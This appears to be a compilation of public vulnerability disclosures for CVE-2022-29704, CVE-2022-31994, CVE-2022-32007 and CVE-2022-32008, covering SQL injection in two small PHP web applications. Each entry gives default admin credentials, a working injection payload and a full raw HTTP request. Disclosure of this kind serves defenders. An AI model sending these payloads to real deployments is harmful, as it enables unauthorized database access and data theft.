CVE-2022-1979: webray.com.cn/'Message' Stored Cross-Site Scripting(XSS).md at main · Xor-Gerke/webray.com.cn

BrowsBox CMS v4.0 was discovered to contain a SQL injection vulnerability.

CVE-2022-29704

Badminton Center Management System v1.0 is vulnerable to SQL Injection via /bcms/admin/?page=sales/view_details&id.

**Badminton Center Management System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15318/badminton-center-management-system-phpoop-free-source-code.html

Current database name: bcms\_db,length is 7

Vulnerability File: /bcms/admin/?page=sales/view\_details&id=

Vulnerability location: /bcms/admin/?page=sales/view\_details&id=, id

\[+\] Payload: /bcms/admin/?page=sales/view\_details&id=6%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /bcms/admin/?page\=sales/view\_details&id\=6%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

When length (database ()) = 6, Content-Length: 28921 

When length (database ()) = 7, Content-Length: 29893

CVE-2022-31994: bug_report/SQLi-9.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/company/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/company/index.php?view=edit&id=

Vulnerability location: /eris/admin/company/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/company/index.php?view=edit&id=-3%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /eris/admin/company/index.php?view\=edit&id\=\-3%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32007: bug_report/SQLi-2.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via eris/admin/vacancy/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/vacancy/index.php?view=edit&id=

Vulnerability location: /eris/admin/vacancy/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/vacancy/index.php?view=edit&id=-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /eris/admin/vacancy/index.php?view\=edit&id\=\-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32008: bug_report/SQLi-3.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/applicants/index.php?view=view&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/applicants/index.php?view=view&id=

Vulnerability location: /eris/admin/applicants/index.php?view=view&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/applicants/index.php?view=view&id=-2%27%20union%20select%201,2,3,4,5,6,database(),8,9,10,11--+ // Leak place ---> id

GET /eris/admin/applicants/index.php?view\=view&id\=\-2%27%20union%20select%201,2,3,4,5,6,database(),8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

Tag

#sql